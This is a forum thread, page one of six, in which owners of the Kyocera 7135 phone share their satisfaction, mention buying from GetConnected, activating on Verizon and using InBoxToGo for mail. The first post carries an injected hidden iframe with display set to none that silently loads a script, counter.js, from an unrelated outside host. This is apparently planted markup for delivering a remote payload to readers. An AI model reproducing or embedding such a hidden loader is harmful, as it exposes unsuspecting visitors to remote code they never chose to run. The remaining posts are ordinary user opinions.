+ Reply to Thread
Page 1 of 6 1 2 3 4 5 ... LastLast

Reply to this post only if you are SATISFIED with yoyr 7135

I love and if I had to make the decision again today, I would pay the $699 from getconnected.com.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Reply to this post only if you are SATISFIED with yoyr 7135

Originally posted by dgelfuso
    I love and if I had to make the decision again today, I would pay the $699 from getconnected.com.
    My wife and I love ours.
    The Edge

I am VERY satisfied and would make the same choice again. That being said, it is important to note that I am into new technology, and am willing to put up with a few bugs and quirks to be able to play with the latest tech. If I wanted 100% reliability, I would wait for Verizon to release the phone, since it is clear that there will be some improvements available with that release.

Alan

I just got back from my first business trip with my 7135. Everything worked without a hitch. I'm using InBoxToGo to retrieve my mail with attachments.

No crashes, no freezes. If there were I was ready for them with BackupBuddy VFS and my 256MB card.

I really got my use of the unlimited n&w browsing the board while out.

My only minor complaint is initial screen draw using Launch Em' and of course I'd love to be able to watch a 30 minute Seinfeld episode but will wait until its perfected.

I've had my 7135 for a week. Activated on Verizon - no problems, no quirks. I'd do it again.

Originally posted by alanb
    I am VERY satisfied and would make the same choice again. That being said, it is important to note that I am into new technology, and am willing to put up with a few bugs and quirks to be able to play with the latest tech. If I wanted 100% reliability, I would wait for Verizon to release the phone, since it is clear that there will be some improvements available with that release.

Alan
    I agree TOTALLY!! I love it and the bugs are sooooooo minor compared to the gain I think it is rediculous.

Originally posted by pdageek
    I'm using InBoxToGo to retrieve my mail with attachments.
    I tried looking for InBoxToGo from PalmGear.com to no avail. Where I can I get it to check it out?

Week 6 with the 7135. LOVE IT!
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

SATISFIED?

seems kinda :o ho hum... yawn.

this thing is the best thing since Hydrogen. (all right its not THAT
    cool, but I'm a tad bit more than satisfied...) wink.

<insert ALL smilies here>

<bugle in heaven>:angel2

Satisfied??

Hell yeah!
    ---------------
    The same thing we do every night, Pinky...

I'm also using InBox to Go from DataViz. Works great and very easy to set up. I'm accessing my work exchange server. I also tried Workstyle. Could get it to work and really didn't want to involve the IS people. With Inbox to Go, no problems, nobody else needed. :spin

Originally posted by alanb
    Ditto. I'm grateful that I "got it like dat". Given the phone/pda choices out there today and the i500 planned for tomorrow, I'd do it again.

Going on week 3 and very happy!! No issues at all! I'm also waiting for Verizon to release it so I can buy another one for my wife. also that way I have an original Verizon to compare in regards to software and issues (that I have so far had none of!!)

RE: Reply to this post only if you are SATISFIED with yoyr 7135

LOL... do you really think you had to specify that only SATISFIED 7135 owners post to this thread? I don't think there is such thing as another kind of 7135 owner

I hope to be able to contribute to this thread (using a 7135 ) someday soon!

I'm glad that you all are happy... I haven't felt any sense of "disappointment" from any post that I have read from a 7135 owner..... when has that ever happened with a cutting edge device that was so hyped up like this before? (I can't remember a time... and this is a lot bigger than the 6035 was back in the day...).
    Please visit my picture site: Robert-O-Rama :)

2 weeks now and more that satisfied. Can't stop playing with it.

Im in the same leage as Robert... I WILL BE SATISFIED... just gotta wait for VZ to satisfy me!
    iPhone therefore iAm.

Day 5 and very satisfied. Still on "shake-down cruise" but coming from a 6035, I could not imagine going back....

Despite the +$, I'm glad I did not wait for VZW....

Ham

I have had mine for about a month now and love it. I have it activated on Verizon in Michigan

I have had mine for over two weeks and love it. It is a great marriage of a PDA and Phone. Whatever minor issues I have encountered are far outweighed by the overall features and performance of the 7135. My only regret is that I waited as long as I did to get it from GetConnected.

+ Reply to Thread
Page 1 of 6 1 2 3 4 5 ... LastLast